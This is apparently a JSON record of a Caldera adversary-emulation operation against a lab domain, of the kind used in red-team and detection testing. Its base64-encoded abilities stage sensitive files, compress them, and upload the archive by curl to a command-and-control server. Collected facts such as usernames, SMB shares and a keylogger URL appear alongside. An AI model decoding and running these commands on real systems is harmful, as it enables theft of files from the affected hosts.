"executor": "sh",
"unique": "b007fc38-9eb7-4320-92b3-9a3ad3e6ec25darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.bookmarks",
"relationships": [
{
"source": "host.chrome.bookmark_title",
"edge": "resolves_to",
"target": "host.chrome.bookmark_url"
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "4e97e699-93d7-4040-b5a3-2e906a58199edarwinsh",
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Stage sensitive files",
"test": "Y3AgIiN7aG9zdC5maWxlLnBhdGhbZmlsdGVycyh0ZWNobmlxdWU9VDEwMDUsbWF4PTMpXX0iICN7aG9zdC5kaXIuc3RhZ2VkW2ZpbHRlcnMobWF4PTEpXX0=",
"description": "copy files to staging directory",
"cleanup": [],
"executor": "sh",
"unique": "4e97e699-93d7-4040-b5a3-2e906a58199edarwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.file.path",
"edge": "",
"target": "",
"score": 1
}
]
},
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "4e97e699-93d7-4040-b5a3-2e906a58199elinuxsh",
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Stage sensitive files",
"test": "Y3AgIiN7aG9zdC5maWxlLnBhdGhbZmlsdGVycyh0ZWNobmlxdWU9VDEwMDUsbWF4PTMpXX0iICN7aG9zdC5kaXIuc3RhZ2VkW2ZpbHRlcnMobWF4PTEpXX0=",
"description": "copy files to staging directory",
"cleanup": [],
"executor": "sh",
"unique": "4e97e699-93d7-4040-b5a3-2e906a58199elinuxsh",
"platform": "linux",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.file.path",
"edge": "",
"target": "",
"score": 1
}
]
},
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "4e97e699-93d7-4040-b5a3-2e906a58199ewindowspsh",
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Stage sensitive files",
"test": "Q29weS1JdGVtICN7aG9zdC5maWxlLnBhdGhbZmlsdGVycyh0ZWNobmlxdWU9VDEwMDUsbWF4PTMpXX0gI3tob3N0LmRpci5zdGFnZWRbZmlsdGVycyhtYXg9MSldfQ==",
"description": "copy files to staging directory",
"cleanup": [],
"executor": "psh",
"unique": "4e97e699-93d7-4040-b5a3-2e906a58199ewindowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.file.path",
"edge": "",
"target": "",
"score": 1
}
]
},
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "4e97e699-93d7-4040-b5a3-2e906a58199ewindowscmd",
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Stage sensitive files",
"test": "Y29weSAje2hvc3QuZmlsZS5wYXRoW2ZpbHRlcnModGVjaG5pcXVlPVQxMDA1LG1heD0zKV19ICN7aG9zdC5kaXIuc3RhZ2VkW2ZpbHRlcnMobWF4PTEpXQ==",
"description": "copy files to staging directory",
"cleanup": [],
"executor": "cmd",
"unique": "4e97e699-93d7-4040-b5a3-2e906a58199ewindowscmd",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.file.path",
"edge": "",
"target": "",
"score": 1
}
]
},
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
}
],
"3": [
{
"id": "300157e5-f4ad-4569-b533-9d1fa0e74d74darwinsh",
"ability_id": "300157e5-f4ad-4569-b533-9d1fa0e74d74",
"tactic": "exfiltration",
"technique_name": "Data Compressed",
"technique_id": "T1002",
"name": "Compress staged directory",
"test": "dGFyIC1QIC16Y2YgI3tob3N0LmRpci5zdGFnZWR9LnRhci5neiAje2hvc3QuZGlyLnN0YWdlZH0gJiYgZWNobyAje2hvc3QuZGlyLnN0YWdlZH0udGFyLmd6",
"description": "Compress a directory on the file system",
"cleanup": [
"cm0gI3tob3N0LmRpci5zdGFnZWR9LnRhci5neg=="
],
"executor": "sh",
"unique": "300157e5-f4ad-4569-b533-9d1fa0e74d74darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": ""
}
]
}
],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "300157e5-f4ad-4569-b533-9d1fa0e74d74linuxsh",
"ability_id": "300157e5-f4ad-4569-b533-9d1fa0e74d74",
"tactic": "exfiltration",
"technique_name": "Data Compressed",
"technique_id": "T1002",
"name": "Compress staged directory",
"test": "dGFyIC1QIC16Y2YgI3tob3N0LmRpci5zdGFnZWR9LnRhci5neiAje2hvc3QuZGlyLnN0YWdlZH0gJiYgZWNobyAje2hvc3QuZGlyLnN0YWdlZH0udGFyLmd6",
"description": "Compress a directory on the file system",
"cleanup": [
"cm0gI3tob3N0LmRpci5zdGFnZWR9LnRhci5neg=="
],
"executor": "sh",
"unique": "300157e5-f4ad-4569-b533-9d1fa0e74d74linuxsh",
"platform": "linux",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": ""
}
]
}
],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "300157e5-f4ad-4569-b533-9d1fa0e74d74windowspsh",
"ability_id": "300157e5-f4ad-4569-b533-9d1fa0e74d74",
"tactic": "exfiltration",
"technique_name": "Data Compressed",
"technique_id": "T1002",
"name": "Compress staged directory",
"test": "Q29tcHJlc3MtQXJjaGl2ZSAtUGF0aCAje2hvc3QuZGlyLnN0YWdlZH0gLURlc3RpbmF0aW9uUGF0aCAje2hvc3QuZGlyLnN0YWdlZH0uemlwIC1Gb3JjZTtzbGVlcCAxOyBscyAje2hvc3QuZGlyLnN0YWdlZH0uemlwIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgc2VsZWN0",
"description": "Compress a directory on the file system",
"cleanup": [
"cm0gI3tob3N0LmRpci5zdGFnZWR9LnppcA=="
],
"executor": "psh",
"unique": "300157e5-f4ad-4569-b533-9d1fa0e74d74windowspsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": ""
}
]
}
],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "300157e5-f4ad-4569-b533-9d1fa0e74d74windowspwsh",
"ability_id": "300157e5-f4ad-4569-b533-9d1fa0e74d74",
"tactic": "exfiltration",
"technique_name": "Data Compressed",
"technique_id": "T1002",
"name": "Compress staged directory",
"test": "Q29tcHJlc3MtQXJjaGl2ZSAtUGF0aCAje2hvc3QuZGlyLnN0YWdlZH0gLURlc3RpbmF0aW9uUGF0aCAje2hvc3QuZGlyLnN0YWdlZH0uemlwIC1Gb3JjZTtzbGVlcCAxOyBscyAje2hvc3QuZGlyLnN0YWdlZH0uemlwIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgc2VsZWN0",
"description": "Compress a directory on the file system",
"cleanup": [
"cm0gI3tob3N0LmRpci5zdGFnZWR9LnppcA=="
],
"executor": "pwsh",
"unique": "300157e5-f4ad-4569-b533-9d1fa0e74d74windowspwsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": ""
}
]
}
],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
}
],
"4": [
{
"id": "ea713bc4-63f0-491c-9a6f-0b01d560b87edarwinsh",
"ability_id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e",
"tactic": "exfiltration",
"technique_name": "Exfiltration Over Command and Control Channel",
"technique_id": "T1041",
"name": "Exfil staged directory",
"test": "Y3VybCAtRiAiZGF0YT1AI3tob3N0LmRpci5jb21wcmVzc30iIC0taGVhZGVyICJYLVJlcXVlc3QtSUQ6IGBob3N0bmFtZWAtI3twYXd9IiAje3NlcnZlcn0vZmlsZS91cGxvYWQ=",
"description": "Exfil the staged directory",
"cleanup": [],
"executor": "sh",
"unique": "ea713bc4-63f0-491c-9a6f-0b01d560b87edarwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "ea713bc4-63f0-491c-9a6f-0b01d560b87elinuxsh",
"ability_id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e",
"tactic": "exfiltration",
"technique_name": "Exfiltration Over Command and Control Channel",
"technique_id": "T1041",
"name": "Exfil staged directory",
"test": "Y3VybCAtRiAiZGF0YT1AI3tob3N0LmRpci5jb21wcmVzc30iIC0taGVhZGVyICJYLVJlcXVlc3QtSUQ6IGBob3N0bmFtZWAtI3twYXd9IiAje3NlcnZlcn0vZmlsZS91cGxvYWQ=",
"description": "Exfil the staged directory",
"cleanup": [],
"executor": "sh",
"unique": "ea713bc4-63f0-491c-9a6f-0b01d560b87elinuxsh",
"platform": "linux",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "ea713bc4-63f0-491c-9a6f-0b01d560b87ewindowspsh",
"ability_id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e",
"tactic": "exfiltration",
"technique_name": "Exfiltration Over Command and Control Channel",
"technique_id": "T1041",
"name": "Exfil staged directory",
"test": "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",
"description": "Exfil the staged directory",
"cleanup": [],
"executor": "psh",
"unique": "ea713bc4-63f0-491c-9a6f-0b01d560b87ewindowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "ea713bc4-63f0-491c-9a6f-0b01d560b87ewindowspwsh",
"ability_id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e",
"tactic": "exfiltration",
"technique_name": "Exfiltration Over Command and Control Channel",
"technique_id": "T1041",
"name": "Exfil staged directory",
"test": "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",
"description": "Exfil the staged directory",
"cleanup": [],
"executor": "pwsh",
"unique": "ea713bc4-63f0-491c-9a6f-0b01d560b87ewindowspwsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
}
]
}
},
"jitter": "4/8",
"facts": [
{
"unique": "file.sensitive.extensionwav",
"trait": "file.sensitive.extension",
"value": "wav",
"score": 1,
"tactic": null
},
{
"unique": "file.sensitive.extensionyml",
"trait": "file.sensitive.extension",
"value": "yml",
"score": 1,
"tactic": null
},
{
"unique": "file.sensitive.extensionpng",
"trait": "file.sensitive.extension",
"value": "png",
"score": 1,
"tactic": null
},
{
"unique": "server.malicious.urlkeyloggedsite.com",
"trait": "server.malicious.url",
"value": "keyloggedsite.com",
"score": 1,
"tactic": null
},
{
"unique": "host.user.nameadministrator\r",
"trait": "host.user.name",
"value": "administrator\r",
"score": 1,
"tactic": "T1033"
},
{
"unique": "host.dir.stagedC:\\Users\\Administrator\\staged\r",
"trait": "host.dir.staged",
"value": "C:\\Users\\Administrator\\staged\r",
"score": 1,
"tactic": "T1074"
},
{
"unique": "domain.smb.shareC:\\Windows",
"trait": "domain.smb.share",
"value": "C:\\Windows",
"score": 1,
"tactic": "T1135"
},
{
"unique": "domain.smb.shareC:\\",
"trait": "domain.smb.share",
"value": "C:\\",
"score": 1,
"tactic": "T1135"
},
{
"unique": "domain.smb.shareMicrosoft.PowerShell.Core\\FileSystem::C:\\Windows\\SYSVOL\\sysvol\\attackrange.local\\SCRIPTS",
"trait": "domain.smb.share",
"value": "Microsoft.PowerShell.Core\\FileSystem::C:\\Windows\\SYSVOL\\sysvol\\attackrange.local\\SCRIPTS",
"score": 1,
"tactic": "T1135"
},
{
"unique": "domain.smb.shareC:\\Windows\\SYSVOL\\sysvol\\attackrange.local\\SCRIPTS",
"trait": "domain.smb.share",
"value": "C:\\Windows\\SYSVOL\\sysvol\\attackrange.local\\SCRIPTS",
"score": 1,
"tactic": "T1135"
},
{
"unique": "domain.smb.shareMicrosoft.PowerShell.Core\\FileSystem::C:\\Windows\\SYSVOL\\sysvol",
"trait": "domain.smb.share",
"value": "Microsoft.PowerShell.Core\\FileSystem::C:\\Windows\\SYSVOL\\sysvol",
"score": 1,
"tactic": "T1135"
},
{
"unique": "domain.smb.shareC:\\Windows\\SYSVOL\\sysvol",
"trait": "domain.smb.share",
"value": "C:\\Windows\\SYSVOL\\sysvol",
"score": 1,
"tactic": "T1135"
}
],
"skipped_abilities": [
{
"fasecd": [
{
"reason": "Wrong platform",
"reason_id": 0,
"ability_id": "c1cd6388-3ced-48c7-a511-0434c6ba8f48",
"ability_name": "Find local users"
},
{
"reason": "Wrong platform",
"reason_id": 0,
"ability_id": "b6f545ef-f802-4537-b59d-2cb19831c8ed",
"ability_name": "Snag broadcast IP"
},
{
"reason": "Fact dependency not fulfilled",
"reason_id": 2,
"ability_id": "ce485320-41a4-42e8-a510-f5a8fe96a644",
"ability_name": "Discover Mail Server"
},
{
"reason": "Wrong platform",
"reason_id": 0,
"ability_id": "b007fc38-9eb7-4320-92b3-9a3ad3e6ec25",
"ability_name": "Get Chrome Bookmarks"
},
{
"reason": "Fact dependency not fulfilled",
"reason_id": 2,
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"ability_name": "Stage sensitive files"
},
{
"reason": "Fact dependency not fulfilled",
"reason_id": 2,
"ability_id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e",
"ability_name": "Exfil staged directory"
}
]
}
]
}